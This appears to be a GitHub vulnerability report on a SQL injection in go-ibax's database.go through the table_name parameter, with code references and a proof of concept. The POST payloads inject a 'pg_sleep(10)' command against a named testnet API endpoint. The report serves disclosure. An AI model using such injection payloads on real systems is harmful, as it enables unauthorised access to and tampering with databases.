You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
SQL Injection vulnerability in /packages/api/database.go of go-ibax via table_name parameter allows attacker to spoof identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.This issue affects versions starting from commits on Jul 18, 2020.
Describe the bug
SQL Injection vulnerability in /packages/api/database.go of go-ibax via table_name parameter allows attacker to spoof identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.This issue affects versions starting from commits on Jul 18, 2020.
file:
go-ibax/packages/api/database.go
Line 187 in 6bac746
go-ibax/packages/api/database.go
Line 189 in 6bac746
commits:
ac76098#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR172
ac76098#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174
POC:
Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData:
①
order=1&table_name=pg_user"%3b+select+pg_sleep(10)%3b+--"&limit=1&page=1
② with where parameter :
order=1&table_name=pg_user"%3b+select+pg_sleep(10)%3b+--"&where=1=1&limit=1&page=1
Reproduction
Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData:
①
order=1&table_name=pg_user"%3b+select+pg_sleep(10)%3b+--"&limit=1&page=1
② with where parameter :
order=1&table_name=pg_user"%3b+select+pg_sleep(10)%3b+--"&where=1=1&limit=1&page=1
as you can see, when I use
pg_sleep
, the request is delayed 10s.System Info
*
Logs
No response
Validations
The text was updated successfully, but these errors were encountered: